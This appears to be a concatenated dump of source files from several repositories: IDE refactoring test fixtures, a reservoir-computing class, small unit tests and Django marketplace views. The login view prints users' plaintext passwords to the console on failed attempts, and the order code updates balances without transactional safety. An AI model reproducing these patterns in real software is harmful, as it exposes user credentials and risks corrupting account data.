def <warning descr="Setter should not return a value">x</warning>(self, r):
return r
```
#### File: argumentList/addParam/stub.py
```python
class object: pass
class datetime: pass
class ABCMeta: pass
class SuperClass: pass
def my_function(new_param,some_param="spam"): pass
def my_function_2(new_param,some_param): pass
def my_function_3(new_param,some_param="spam",some_another_param="eggs"): pass
```
#### File: refactoring/changeSignature/fixDocstringRemove.before.py
```python
def foo(a, d):
"""
:param a:
:param d:
"""
pass
foo("a", "b")
```
#### File: refactoring/changeSignature/keepKeywordOfArgumentBeforeEmptyVararg.before.py
```python
def f(y, *args, x):
pass
f(1, x=42)
```
#### File: refactoring/changeSignature/removeKeywordFromArgumentBeforeVararg.before.py
```python
def f(y, *args, x):
pass
f(1, 2, 3, x=42)
```
#### File: refactoring/changeSignature/updateDocstring.after.py
```python
def foo(a, d1=1):
"""
:param a:
:param d1:
"""
pass
foo("a", d1="b")
```
#### File: refactoring/extractmethod/BreakAst.after.py
```python
def cylinder_volume(r, h):
h * bar(r)
def bar(r_new):
return PI * r_new ** 2
```
#### File: refactoring/extractmethod/ClassMethod.before.py
```python
class C:
@classmethod
def foo(cls):
<selection>print('foo', cls)</selection>
```
#### File: refactoring/extractmethod/CommentIncluded.after.py
```python
def baz():
tmp = "!" # try to extract this assignment, either with or without this comment
baz()
def bar(self):
pass
```
#### File: refactoring/extractmethod/DuplicateInClass.before.py
```python
class A:
def baz(self):
print<caret> 1
print 1
def bar(self):
print 1
```
#### File: refactoring/extractmethod/GlobalVarAssignment.after.py
```python
x = 0
def foo():
global x
bar()
def bar():
global x
x = 1
```
#### File: refactoring/extractmethod/MethodContext.before.py
```python
class C:
def foo(self):
<selection>for x in [1, 2]:
print x</selection>
```
#### File: refactoring/extractmethod/MethodIndent.before.py
```python
class Foo(X, Y, Z):
def __init__(self):
for base in self__class__.__bases__:
<selection>try: base.__init__(self)
except AttributeError: pass</selection>
```
#### File: refactoring/extractmethod/Nonlocal.after.py
```python
def foo():
x = 1
def bar():
nonlocal x
baz()
print(x)
def baz():
nonlocal x
x = 2
bar()
foo()
```
#### File: refactoring/extractmethod/Statement.before.py
```python
def f():
a = 1
b = 1
<selection>print(a + b * 123)</selection>
```
#### File: extractsuperclass/moveAndMakeAbstractImportExistsPy3/source_module.py
```python
class MyClass():
@classmethod
def foo_method(cls):
spam = "eggs"
```
#### File: refactoring/extractsuperclass/withImport.before.py
```python
import os
class A(object):
def foo(self):
os.stat_result.n_fields()
```
#### File: refactoring/inlinelocal/py994.after.py
```python
class C:
def foo(self):
return Conference()
```
#### File: refactoring/introduceConstant/insertAfterImport.py
```python
import urllib
import urllib2
def foo():
return <caret>42
```
#### File: refactoring/introduceField/py4437.py
```python
class SomeClass():
def __init__(self):
self.x = 1
def foo(self):
<selection>''</selection>
```
#### File: refactoring/introduceParameter/localVariable1.py
```python
def f():
a = 1
print <caret>a + 3
```
#### File: refactoring/introduceParameter/localVariableParam.py
```python
def f(b=1):
return <caret>b + 1
```
#### File: refactoring/introduceVariable/backslash.after.py
```python
def f(x):
a = x.foo.bar
return a.baz()
```
#### File: refactoring/introduceVariable/callExpressionQualifier.after.py
```python
class MyClass:
def method(self):
return 42
a = MyClass()
x = a.method()
```
#### File: refactoring/introduceVariable/selectionBreaksBinaryOperator.after.py
```python
def foo():
a = 2 + 3
print 1 + a
```
#### File: refactoring/introduceVariable/suggestKeywordArgumentName.py
```python
def foo(**kwargs):
pass
foo(extra_context=<caret>{'a': 1})
```
#### File: refactoring/invertBoolean/parameter.before.py
```python
def foo(v<caret>ar=True):
var1 = True
return var
```
#### File: refactoring/makeFunctionTopLevel/localFunctionSimple.py
```python
global_var = 'spam'
def enclosing(p1, p2):
x = 42
def lo<caret>cal(p):
def nested():
print(p, x)
print(p1, p)
local('foo')
```
#### File: methodInsertionPositionUsageInAnotherFile/before/other.py
```python
def already_existing1():
pass
def already_existing2():
pass
from main import C
C().method()
def already_existing3():
pass
```
#### File: refactoring/makeFunctionTopLevel/methodNonlocalReferenceToOuterScope.py
```python
def func():
x = True
class C:
def me<caret>thod(self):
nonlocal x
x = False
```
#### File: refactoring/makeFunctionTopLevel/methodOtherMethodCalls.py
```python
class C:
def me<caret>thod(self):
self.another()
def another(self):
pass
```
#### File: refactoring/makeFunctionTopLevel/methodOverriddenSelf.py
```python
class C:
def me<caret>thod(self):
self = object()
```
#### File: refactoring/makeFunctionTopLevel/methodSelfUsedAsOperand.py
```python
class C(int):
def me<caret>thod(self):
print(self + 42)
```
#### File: refactoring/makeFunctionTopLevel/methodUniqueNameOfExtractedQualifier.after.py
```python
class AbstractBaseResponseHandler:
pass
def method(response, code):
if response:
return code
def func(abstract_base_response_handler, a):
a1 = AbstractBaseResponseHandler()
method(a1.response, a1.code)
```
#### File: refactoring/makeFunctionTopLevel/methodUniqueParamNames.after.py
```python
class C:
pass
def method(foo2, bar1, foo, foo1, bar):
print(foo2, bar1)
c = C()
method(c.foo, c.bar, 1, 2, bar=3)
```
#### File: refactoring/makeFunctionTopLevel/recursiveMethod.py
```python
class C:
def __init__(self, foo):
self.foo = foo
def me<caret>thod(self, foo):
self.method(self.foo)
C(1).method(2)
```
#### File: after/src/a.py
```python
from b import C
def main():
c = C()
print c
```
#### File: after/src/a.py
```python
import b
FOO = 'spam'
def func():
global FOO
b.VAR += 1
```
#### File: after/src/dst.py
```python
from lib import bar
from lib import baz, quux
from lib import foo
print(baz, quux)
def func():
print(foo, bar)
```
#### File: after/src/a.py
```python
from b import f
def f_usage():
return f(14)
class C(object):
def g(self, x):
return x
class D(C):
def g(self, x, y):
return super(D, self).f(x) + y
class E(object):
def g(self):
return -1
```
#### File: after/src/b.py
```python
import lib1.mod1
def f(x):
return lib1.mod1.k(x)(42)
```
#### File: before/src/a.py
```python
import lib1.mod1
def f(x):
return lib1.mod1.k(x)(42)
```
#### File: before/src/c.py
```python
import a
def main():
print(a.f(42))
```
#### File: before/src/classFile.py
```python
from collections import namedtuple
class Pipeline(namedtuple('_Pipeline', 'name')):
def __new__(cls, name):
return super(Pipeline, cls).__new__(cls, name)
def __init__(self, name):
pass
```
#### File: refactoring/pullup/dependenciesOrder.py
```python
class DataHolder:
VAR = 1
class Parent:
BOO = 12
def __init__(self):
self.c = 1
class Child(Parent): # Try to pull members up
CLASS_FIELD = 42
ANOTHER_CLASS_FIELD = CLASS_FIELD
FIELD = Parent.BOO
A_FIELD = DataHolder.VAR
@staticmethod
def foo():
return "A"
SOME_VAR = foo()
def __init__(self):
super(Child, self).__init__()
self.a = 12
self.b = self.c
self.d = Parent.BOO
i = 1
```
#### File: pullup/fieldMove/Class.after.py
```python
from SuperClass import SuperClass
class AnyClass(SuperClass):
def __init__(self):
super().__init__()
```
#### File: refactoring/pullup/instanceNotDeclaredInInit.py
```python
class Parent(object):
pass
class Child(Parent):
def foo(self):
self.foo = 12
```
#### File: refactoring/pullup/pyPullUpInfoModel.py
```python
class EmptyParent:pass
class SomeParent:
PARENT_CLASS_FIELD = 42
def __init__(self):
self.parent_instance_field = "egg"
def parent_func(self):
pass
class ChildWithDependencies(SomeParent, EmptyParent):
CLASS_FIELD_FOO = 42
CLASS_FIELD_DEPENDS_ON_CLASS_FIELD_FOO = CLASS_FIELD_FOO
CLASS_FIELD_DEPENDS_ON_PARENT_FIELD = SomeParent.PARENT_CLASS_FIELD
def __init__(self):
SomeParent.__init__(self)
self.instance_field_bar = 42
self.depends_on_instance_field_bar = self.instance_field_bar
self.depends_on_class_field_foo = ChildWithDependencies.CLASS_FIELD_FOO
@property
def new_property(self):
return 1
def _set_prop(self, val):
pass
def _get_prop(self):
return 1
def _del_prop(self):
pass
old_property = property(fset=_set_prop)
old_property_2 = property(fget=_get_prop)
old_property_3 = property(fdel=_del_prop)
@property
def new_property(self):
return 1
@new_property.setter
def new_property(self, val):
pass
@property
def new_property_2(self):
return 1
def normal_method(self):
pass
def method_depends_on_parent_method(self):
self.parent_func()
pass
def method_depends_on_parent_field(self):
i = self.parent_instance_field
pass
def method_depends_on_normal_method(self):
self.normal_method()
def method_depends_on_instance_field_bar(self):
eggs = self.instance_field_bar
def method_depends_on_old_property(self):
i = 12
self.old_property = i
q = self.old_property_2
del self.old_property_3
def method_depends_on_new_property(self):
self.new_property = 12
print(self.new_property_2)
```
#### File: pushdown/multiFileImports/parent_module.py
```python
from shared_module import module_function
class Parent(object):
def should_be_pushed(self):
module_function()
```
#### File: refactoring/rename/googleDocStringReturnType.py
```python
class F<caret>oo: pass
def func(foo):
"""
Returns:
Foo: ignored
"""
pass
```
#### File: refactoring/rename/renameField_after.py
```python
class Foo:
def __init__(self, id_value):
self.qu = id_value
f = Foo(3)
f.q<caret>u
```
#### File: refactoring/rename/renameInheritors_after.py
```python
class A:
def qu(self): pass
class B(A):
def qu(self): pass
```
#### File: refactoring/rename/renameLocalWithGenerator.py
```python
def function():
foo = 1
gen_expr = (f<caret>oo for foo in xrange(10))
print foo
```
#### File: refactoring/rename/renameLocalWithNestedGenerators.py
```python
def somefunc():
xx, yy = 1, 1
gen_object = (xx for y<caret>y in lst1 for xx in yy)
print(xx, yy)
```
#### File: refactoring/rename/renameSelfAndParameterAttribute.py
```python
class С:
def __init__(self, x=None):
if x is None:
self.foo = {
'A': {
'x': 0,
'y': 0,
},
}
else: # init was given the previous state
assert isinstance(x, С)
self.foo = {
'A': {
'x': x.f<caret>oo['A']['x'],
'y': x.foo['A']['y'],
},
}
```
#### File: resolve/callee/DecoParamCall.py
```python
def deco(prefix):
def fun(f):
print f
def dfun():
return [prefix, f()]
return dfun
return fun
@<caret>deco(1)
def foo():
pass
```
#### File: testData/resolve/ClassPrivateInherited.py
```python
class A(object):
__A = 1
class B(A):
def f(self):
self._<ref>_A # must fail
```
#### File: testData/resolve/DefaultInClass.py
```python
class A:
FOO = 1
def foo(self, param=F<ref>OO):
pass
```
#### File: testData/resolve/DunderClassInDeclarationInsideFunction.py
```python
def foo():
class A:
print(__class__)
# <ref>
return A()
```
#### File: testData/resolve/FieldInCondition.py
```python
class A:
def __init__(self):
if True:
self.qq = 1
def test(self):
print self.q<ref>q
```
#### File: testData/resolve/FStringNestedScopes.py
```python
def f(foo):
def g():
foo = 42
print(f'{foo}')
<ref>
```
#### File: testData/resolve/GlobalInNestedFunction.py
```python
foo = 0
def outer():
def inner():
global fo<ref>o
print(foo)
inner()
outer()
```
#### File: testData/resolve/GoogleDocstringParamType.py
```python
from datetime import datetime
def f(param):
"""
Parameters:
param (datetime) : timestamp
<ref>
"""
```
#### File: testData/resolve/InitOrNewReturnsInitWhenNewIsFirst.py
```python
class MyClass(object):
def __new__(cls):
return object.__new__(cls)
def __init__(self):
self.x = 42
```
#### File: testData/resolve/LookAhead.py
```python
def f():
return f<ref>oo
foo = 1
```
#### File: customMemberTargetClass/pkg/mod1.py
```python
class Clazz(object):
def member_fun(self):
return True
```
#### File: resolve/pyToJava/SuperMethod.py
```python
from java import util
class MyList(util.ArrayList):
def calc_size(self):
return self.si<ref>ze()
```
#### File: testData/resolve/UnboundVariableOnClassLevelDeclaredBelowAsTarget.py
```python
foo = 'global'
def method(foo):
class A:
print(foo)
# <ref>
foo = 'local'
print(foo)
```
#### File: testData/resolve/UnboundVariableOnClassLevelNotDeclaredBelow.py
```python
def method(foo):
class A:
print(foo)
# <ref>
```
#### File: testData/structureView/baseClassNames.py
```python
import lib1
class B1:
def f(self, x):
return x
class B2(object):
@staticmethod
def g(x):
return x
class C(B1, B2):
pass
class D1(C):
pass
class D2(C):
pass
# PY-3714
class D3(lib1.C):
pass
# PY-3731
class D4(foo.bar.C):
pass
```
#### File: testData/stubs/AttributeTypeDeclaration.py
```python
class MyClass:
foo: str
def __init__(self):
self.bar: int
```
#### File: stubs/complexGenericType/mod.py
```python
from typing import TypeVar, Generic, Tuple
T1 = TypeVar('T1')
T2 = TypeVar('T2')
T3 = TypeVar('T3')
class Base(Generic[T1, T2, T3]):
def __init__(self, x: T1):
pass
def m(self, x: T3) -> Tuple[T1, T2, T3]:
pass
```
#### File: stubs/dataclassField/dataclasses.py
```python
def dataclass(_cls=None, *, init=True, repr=True, eq=True, order=False,
unsafe_hash=False, frozen=False):
pass
def field(*, default=MISSING, default_factory=MISSING, init=True, repr=True,
hash=None, compare=True, metadata=None):
pass
```
#### File: testData/stubs/StubStructure.py
```python
def deco(fun):
return fun # valid
class FooClass:
staticField = deco
globs = globals()
def __init__(self):
self.instanceField = 2
@deco
def fooFunction(fooParam1, fooParam2=0) :
notAField = 3
pass
def topLevelFunction(tlfp1, tlfp2) :
pass
top1 = 1
if True:
top2 = 2
class BarClass(object):
__value = 0
def __get(self):
return self.__value
def __set(self, val):
self.__value = val
value = property(__get)
setvalue = property(fset=__set)
class BazClass(object):
__x = 1
@property
def x(self):
return self.__x
@x.setter
def x(self, v):
self.__x = v
```
#### File: testData/stubs/TypeAliasInParameterAnnotation.py
```python
from typing import Dict, Any
JsonObject = Dict[str, Any]
def func(x: JsonObject):
pass
```
#### File: createConfigurationTest/tests_folder/test_lonely.py
```python
from unittest import TestCase
from logic import smart_func
from tests_package.test_tools import ANSWER
class TestLonely(TestCase):
def test_test(self):
self.assertEqual(ANSWER, smart_func())
```
#### File: unit/subtestDots/test_test.py
```python
import unittest
class SampleTest(unittest.TestCase):
def test_sample(self):
for i in range(10):
with self.subTest(i=str(i)+'.'+str(i)):
self.assertTrue(i > 1)
```
#### File: unit/testDiff/test_test.py
```python
import unittest
class MyTestCase(unittest.TestCase):
def test_case(self):
self.assertEqual(1, 2, ('a', 'tuple'))
```
#### File: stdlib/3/builtins_test.py
```python
def test_zip():
assert(list(zip([1])) == [(1,)])
assert(list(zip([1], [2])) == [(1, 2,)])
assert(list(zip([1], [2], [3])) == [(1, 2, 3)])
assert(list(zip([1], [2], [3], [4])) == [(1, 2, 3, 4)])
assert(list(zip([1], [2], [3], [4], [5])) == [(1, 2, 3, 4, 5)])
assert(list(zip([1], [2], [3], [4], [5], [6])) == [(1, 2, 3, 4, 5, 6)])
assert(list(zip([1], [2], [3], [4], [5], [6], [7])) == [(1, 2, 3, 4, 5, 6, 7)])
assert(list(zip([1], [2], [3], [4], [5], [6], [7], [8])) == [(1, 2, 3, 4, 5, 6, 7, 8)])
assert(list(zip([1], [2], [3], [4], [5], [6], [7], [8], [9])) == [(1, 2, 3, 4, 5, 6, 7, 8, 9)])
assert(list(zip([1], [2], [3], [4], [5], [6], [7], [8], [10])) == [(1, 2, 3, 4, 5, 6, 7, 8, 10)])
def test_open_path_like():
import sys
if sys.version_info >= (3, 6):
class A:
def __fspath__(self):
return sys.argv[0]
with open(A()) as f:
assert f.name == sys.argv[0]
def test_classmethod():
import abc
# test __init__
def a():
pass
assert isinstance(classmethod(a), classmethod)
# test __new__
def b():
pass
def c():
pass
def d():
pass
def e():
pass
assert isinstance(classmethod.__new__(classmethod, b, c, d=d, e=e), classmethod)
# test __func__
def f():
pass
assert classmethod(f).__func__ == f
# test __isabstractmethod__
@abc.abstractmethod
def g():
pass
def h():
pass
assert classmethod(g).__isabstractmethod__
assert not classmethod(h).__isabstractmethod__
# test __get__
class WrappedWithSM:
@classmethod
def foo(cls):
return 10
class ReassignedWithSM:
def foo(cls):
return 10
foo = classmethod(foo)
assert type(WrappedWithSM.__dict__["foo"].__get__(WrappedWithSM, type)).__name__ == "method"
assert type(WrappedWithSM.__dict__["foo"].__get__(WrappedWithSM)).__name__ == "method"
assert type(ReassignedWithSM.__dict__["foo"].__get__(ReassignedWithSM, type)).__name__ == "method"
assert type(ReassignedWithSM.__dict__["foo"].__get__(ReassignedWithSM)).__name__ == "method"
# test __dict__.keys()
assert set(classmethod.__dict__.keys()) == {'__init__', '__new__', '__func__', '__isabstractmethod__', '__get__',
'__dict__', '__doc__'}
def test_staticmethod():
import abc
# test __init__
def a():
pass
assert isinstance(staticmethod(a), staticmethod)
# test __new__
def b():
pass
def c():
pass
def d():
pass
def e():
pass
assert isinstance(staticmethod.__new__(staticmethod, b, c, d=d, e=e), staticmethod)
# test __func__
def f():
pass
assert staticmethod(f).__func__ == f
# test __isabstractmethod__
@abc.abstractmethod
def g():
pass
def h():
pass
assert staticmethod(g).__isabstractmethod__
assert not staticmethod(h).__isabstractmethod__
# test __get__
class WrappedWithSM:
@staticmethod
def foo():
return 10
class ReassignedWithSM:
def foo():
return 10
foo = staticmethod(foo)
assert type(WrappedWithSM.__dict__["foo"].__get__(WrappedWithSM, type)).__name__ == "function"
assert type(WrappedWithSM.__dict__["foo"].__get__(WrappedWithSM)).__name__ == "function"
assert type(ReassignedWithSM.__dict__["foo"].__get__(ReassignedWithSM, type)).__name__ == "function"
assert type(ReassignedWithSM.__dict__["foo"].__get__(ReassignedWithSM)).__name__ == "function"
# test __dict__.keys()
assert set(staticmethod.__dict__.keys()) == {'__init__', '__new__', '__func__', '__isabstractmethod__', '__get__',
'__dict__', '__doc__'}
def test_str_init_new():
class A:
def __str__(self):
return "A"
assert str.__new__(str) is not None
assert str.__new__(str, A()) is not None
assert str.__new__(str, b"foo") is not None
assert str.__new__(str, b"foo", "utf-8") is not None
assert str.__new__(str, b"foo", "utf-8", "strict") is not None
assert str() is not None
assert str(A()) is not None
assert str(b"foo") is not None
assert str(b"foo", "utf-8") is not None
assert str(b"foo", "utf-8", "strict") is not None
def test_int_init_new():
class A:
def __int__(self):
return 5
assert int.__new__(int) is not None
assert int.__new__(int, A()) is not None
assert int.__new__(int, u"100") is not None
assert int.__new__(int, b"100") is not None
assert int.__new__(int, u"100", 2) is not None
assert int.__new__(int, b"100", 2) is not None
assert int() is not None
assert int(A()) is not None
assert int(u"100") is not None
assert int(b"100") is not None
assert int(u"100", 2) is not None
assert int(b"100", 2) is not None
def test_dict_update():
d = {}
d.update({"k1": 1, "v1": 1})
d.update([("k2", 2), ("v2", 2)])
d.update(k3=3, v3=3)
assert d == {"k1": 1, "v1": 1, "k2": 2, "v2": 2, "k3": 3, "v3": 3}
``` |
{
"source": "jnthnroy/Reservoir-Computing-framework-for-multivariate-time-series-classification",
"score": 3
} |
#### File: Reservoir-Computing-framework-for-multivariate-time-series-classification/code/reservoir.py
```python
import numpy as np
from scipy import sparse
class Reservoir(object):
"""
Build a reservoir and evaluate internal states
Parameters:
n_internal_units = processing units in the reservoir
spectral_radius = largest eigenvalue of the reservoir matrix of connection weights
leak = amount of leakage in the reservoir state update (optional)
connectivity = percentage of nonzero connection weights (unused in circle reservoir)
input_scaling = scaling of the input connection weights
noise_level = deviation of the Gaussian noise injected in the state update
    circle = generate deterministic reservoir with circle topology
"""
def __init__(self, n_internal_units=100, spectral_radius=0.99, leak=None,
connectivity=0.3, input_scaling=0.2, noise_level=0.01, circle=False):
# Initialize attributes
self._n_internal_units = n_internal_units
self._input_scaling = input_scaling
self._noise_level = noise_level
self._leak = leak
# Input weights depend on input size: they are set when data is provided
self._input_weights = None
# Generate internal weights
if circle:
self._internal_weights = self._initialize_internal_weights_Circ(
n_internal_units,
spectral_radius)
else:
self._internal_weights = self._initialize_internal_weights(
n_internal_units,
connectivity,
spectral_radius)
def _initialize_internal_weights_Circ(self, n_internal_units, spectral_radius):
# Construct reservoir with circular topology
internal_weights = np.zeros((n_internal_units, n_internal_units))
internal_weights[0,-1] = 1.0
for i in range(n_internal_units-1):
internal_weights[i+1,i] = 1.0
# Adjust the spectral radius.
E, _ = np.linalg.eig(internal_weights)
e_max = np.max(np.abs(E))
internal_weights /= np.abs(e_max)/spectral_radius
return internal_weights
def _initialize_internal_weights(self, n_internal_units,
connectivity, spectral_radius):
# Generate sparse, uniformly distributed weights.
internal_weights = sparse.rand(n_internal_units,
n_internal_units,
density=connectivity).todense()
# Ensure that the nonzero values are uniformly distributed in [-0.5, 0.5]
internal_weights[np.where(internal_weights > 0)] -= 0.5
# Adjust the spectral radius.
E, _ = np.linalg.eig(internal_weights)
e_max = np.max(np.abs(E))
internal_weights /= np.abs(e_max)/spectral_radius
return internal_weights
def _compute_state_matrix(self, X, n_drop=0):
N, T, _ = X.shape
previous_state = np.zeros((N, self._n_internal_units), dtype=float)
# Storage
state_matrix = np.empty((N, T - n_drop, self._n_internal_units), dtype=float)
for t in range(T):
current_input = X[:, t, :]
# Calculate state
state_before_tanh = self._internal_weights.dot(previous_state.T) + self._input_weights.dot(current_input.T)
# Add noise
state_before_tanh += np.random.rand(self._n_internal_units, N)*self._noise_level
# Apply nonlinearity and leakage (optional)
if self._leak is None:
previous_state = np.tanh(state_before_tanh).T
else:
previous_state = (1.0 - self._leak)*previous_state + np.tanh(state_before_tanh).T
# Store everything after the dropout period
if (t > n_drop - 1):
state_matrix[:, t - n_drop, :] = previous_state
return state_matrix
def get_states(self, X, n_drop=0, bidir=True):
N, T, V = X.shape
if self._input_weights is None:
self._input_weights = (2.0*np.random.binomial(1, 0.5 , [self._n_internal_units, V]) - 1.0)*self._input_scaling
# compute sequence of reservoir states
states = self._compute_state_matrix(X, n_drop)
# reservoir states on time reversed input
if bidir is True:
X_r = X[:, ::-1, :]
states_r = self._compute_state_matrix(X_r, n_drop)
states = np.concatenate((states, states_r), axis=2)
return states
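# --- Hedged usage sketch (editor addition, not part of the original file) ---
# Shows how the class above is typically driven: X is a batch of multivariate
# time series of shape (N, T, V). The shapes and hyperparameter values below
# are illustrative assumptions, not taken from the repository.
if __name__ == '__main__':
    X_demo = np.random.randn(10, 50, 3)    # 10 series, 50 time steps, 3 variables
    res = Reservoir(n_internal_units=100, spectral_radius=0.99, leak=0.3,
                    connectivity=0.3, input_scaling=0.2, noise_level=0.01)
    H = res.get_states(X_demo, n_drop=5, bidir=True)
    print(H.shape)                          # (10, 45, 200): bidir doubles the state size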
``` |
{
"source": "jnthnrzr/food-craving-survey",
"score": 3
} |
#### File: backend/tests/test_models.py
```python
import unittest
from datetime import datetime
from unittest.mock import MagicMock
from app.models import Trial
class TestMockTrialModel(unittest.TestCase):
@classmethod
def setUpClass(cls):
mock_trial = MagicMock(spec=Trial)
mock_trial.participant = 99
mock_trial.session = 99
mock_trial.date = datetime.today()
cls.trial = mock_trial
def test_trial_instance(self):
trial = self.trial
self.assertIsInstance(trial, Trial)
def test_participant_label(self):
label = 'participant'
attributes = dir(self.trial)
self.assertIn(label, attributes)
def test_participant_data_type(self):
data_type = type(self.trial.participant)
self.assertIs(data_type, int)
def test_session_data_type(self):
data_type = type(self.trial.session)
self.assertIs(data_type, int)
def test_session_label(self):
label = 'session'
attributes = dir(self.trial)
self.assertIn(label, attributes)
def test_date_label(self):
label = 'date'
attributes = dir(self.trial)
self.assertIn(label, attributes)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jnthnrzr/git-hooks",
"score": 3
} |
#### File: jnthnrzr/git-hooks/test_my_math.py
```python
import my_math
import unittest
class TestAdd(unittest.TestCase):
def test_add_integers(self):
result = my_math.add(1, 2)
self.assertEqual(result, 3)
def test_add_floats(self):
result = my_math.add(10.5, 2)
self.assertEqual(result, 12.5)
class TestMultiply(unittest.TestCase):
def test_multiply_integers(self):
result = my_math.multiply(1, 2)
self.assertEqual(result, 2)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jnthnrzr/rent-buy-sell",
"score": 2
} |
#### File: marketplace/views/buy_item_details_user.py
```python
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from ..models import UserProfile, Product
from ..date_checker import update_all
@login_required
def buy_item_details_users(request):
update_all()
profile = UserProfile.objects.get(user=request.user)
context_dict = {
'user': request.user.username,
'money': profile.balance,
'user.is_authenticated': True,
}
if request.method == "POST":
product_pk = request.POST.get('pk','')
product = Product.objects.get(pk = product_pk) # access the product, do what you will with it
# TODO Add to shopping cart logic
return render(request, 'item-details.html', context_dict)
```
#### File: marketplace/views/orders.py
```python
from django.contrib.auth.decorators import login_required
from django.db.models import Sum
from django.contrib.auth.models import User
from django.shortcuts import render
from ..models import Order, ShoppingCart, UserProfile, Rating, Complaint, Product
from ..update_rating import update_rating
from ..date_checker import update_all
@login_required
def orders(request):
# Render the page for previous orders
profile = UserProfile.objects.get(user=request.user)
context_dict = dict()
update_all()
if "confirm_checkout" in request.POST:
cart = ShoppingCart.objects.get(user=profile)
#print("\n\n",cart.products.all,"\n\n")
#totalPrice=0
#for i in cart:
# totalPrice+=double(i.price)
print("\n\n", float(cart.products.all().aggregate(Sum('price'))['price__sum']), profile.balance, "\n\n")
if float(cart.products.all().aggregate(Sum('price'))['price__sum']) > profile.balance:
context_dict['username'] = request.user.username
context_dict['money'] = profile.balance
context_dict['messages']="You do not have enough money on your account for these purchases."
return render(request, 'badAction.html', context_dict)
new_order = Order(user=profile)
new_order.save()
new_order.products.add(*cart.products.all())
for product in cart.products.all():
seller = product.seller
seller.balance += product.price
seller.save()
profile.balance -= product.price
profile.save()
product.quantity -= 1
if product.quantity == 0:
product.is_active = False
product.save()
profile.transactions += len(cart.products.all())
profile.save()
# cart_total = cart.products.all().aggregate(Sum('price'))
# print("++++++++++++++++++ CART TOTAL IS:", cart_total)
# amount = cart_total['price__sum']
new_order.totalPrice = cart.totalPrice
print("++++++++ NEW ORDER TOTALING:", new_order.totalPrice)
# print("CART TOTAL was: $", amount)
#context_dict['totalPrice'] = new_order.totalPrice
new_order.save()
cart.delete()
all_orders = Order.objects.filter(user=profile)
#print(all_orders[0].totalPrice)
# Check if previous orders exist
if all_orders.count():
orders_list = list(all_orders.all())
order_dic = dict()
for order in orders_list:
product_dic = dict()
# print("*************", order.totalPrice)
product_dic['total'] = float(order.totalPrice)
product_list = list(order.products.all())
product_dic['products'] = product_list
# print("%%%%%%%%%% product_dic: ", product_dic)
order_dic[str(order.pk)] = product_dic
# order_dic[str(order.pk)] = product_list
context_dict['allorders'] = order_dic
print("######### allorders::", order_dic)
# orderlist=list(all_orders.all())
# price_dic={}
# for i in orderlist:
# price_dic[str(i.pk)] = i.totalPrice
# context_dict['totalPrice'] = price_dic
# print("\n\nTotal price dict\n",context_dict['totalPrice'],"\n\n")
# print("\n\nFull dictionary:\n",context_dict,"\n\n")
context_dict['username'] = request.user.username
context_dict['money'] = profile.balance
#context_dict['all_orders'] = all_orders
#print("\n\n",all_orders,"\n\n")
#context_dict['totalPrice'] = all_orders.totalPrice
check_vip(profile)
if "rating" in request.POST:
rating_input = request.POST['rating']
listed_product_pk = request.POST['product_pk']
prod = Product.objects.get(pk= listed_product_pk)
listed_seller = prod.seller
user_seller = User.objects.get(username = listed_seller)
seller_profile = UserProfile.objects.get(user = user_seller)
r = Rating.objects.get_or_create(user = seller_profile, rated_by = profile, product = prod)[0]
r.rating = int(rating_input)
# new_rating = Rating(user=seller_profile,rating = int(rating_input), rated_by = profile, product = prod)
r.save()
update_rating(seller_profile)
check_rater(profile)
return render(request, 'orders.html', context_dict)
def check_rater(rater_profile):
sr = Rating.objects.filter(rated_by = rater_profile).order_by('-id')[:5]
sr_list = list(sr.values_list('rating',flat = True))
if len(sr_list) >= 3:
if sr_list.count(1) == 3:
rater_profile.strikes += 1
rater_profile.save()
print ('strikes ', rater_profile.strikes)
if len(sr_list)>= 5:
if sr_list.count(5) == 5:
rater_profile.strikes += 1
rater_profile.save()
```
#### File: marketplace/views/process_complaint.py
```python
from django.contrib.auth.models import User
from django.shortcuts import render
from ..models import Complaint, UserProfile
def process_complaint(request):
'''
    *** Put the functions that process complaints and send them to the db here - same method as the others.
    Use request.POST['name value in template'] to access values.
    Users can submit a complaint about another user. If they get the username wrong,
    they will still be told the complaint was submitted, but it will not necessarily be
    registered, because the reported user has to exist in our system.
:param request:
:return:
'''
profile= UserProfile.objects.get(user=request.user)
context_dict = {
'username': request.user.username,
'money': profile.balance,
}
if User.objects.filter(username=request.POST['reported_user']).exists():
complained_user = User.objects.get(username = request.POST['reported_user'])
complaint_user_profile = UserProfile.objects.get(user = complained_user)
complaint_str = request.POST['complaint']
complaint = Complaint( user_id = complaint_user_profile,
complaint = complaint_str)
complaint.save()
return render(request,'complaint-submitted.html', context_dict)
```
#### File: marketplace/views/show_results.py
```python
from django.shortcuts import render
from ..models import Product, UserProfile
from ..date_checker import update_all
def show_results(request):
# Searching for products is handled by this function
context_dict = dict()
update_all()
if request.user.is_authenticated:
profile = UserProfile.objects.get(user=request.user)
context_dict['username'] = request.user.username
context_dict['money'] = profile.balance
(query, method, min, max) = (request.GET['query'],
request.GET['method'],
request.GET['minprice'],
request.GET['maxprice'], )
results = Product.objects.filter(option=method, is_active=True)
# print("ALL RESULTS: ", results)
if query: # TODO add logic to check for whitespace
results = Product.objects.filter(title__icontains=query,
option=method, is_active=True)
(context_dict['results'], context_dict['found']) = (results, True)
if not results:
(context_dict['results'], context_dict['found']) = (results, False)
else:
(context_dict['results'], context_dict['found']) = (results, True)
return render(request, 'results.html', context_dict)
```
#### File: marketplace/views/user_login.py
```python
from django.contrib.auth import authenticate, login
# from django.urls import reverse
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from ..models import UserProfile
from ..date_checker import update_all
def user_login(request):
update_all()
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
profile = UserProfile.objects.get(user=user)
if profile.verified_by_admin == True:
login(request, user)
context_dict = {
'username': request.user.username,
'money': profile.balance,
}
# Redirect to a success page.
# return HttpResponseRedirect(reverse('index'))
return render(request, 'index.html', context_dict)
else:
return HttpResponse("You've not been verified by an admin.")
else:
# Return a 'disabled account' error message
return HttpResponse("Your account is disabled.")
else:
# Bad login details were provided. So we can't log the user in.
print("Invalid login details: {0}, {1}".format(username, password))
return HttpResponse("Invalid login details supplied.")
# The request is not a HTTP POST, so display the login form.
# This scenario would most likely be a HTTP GET.
else:
# No context variables to pass to the template system, hence the blank dictionary object...
return render(request, 'login.html', {})
``` |
{
"source": "jnulzl/jnulzl-PRNet",
"score": 2
} |
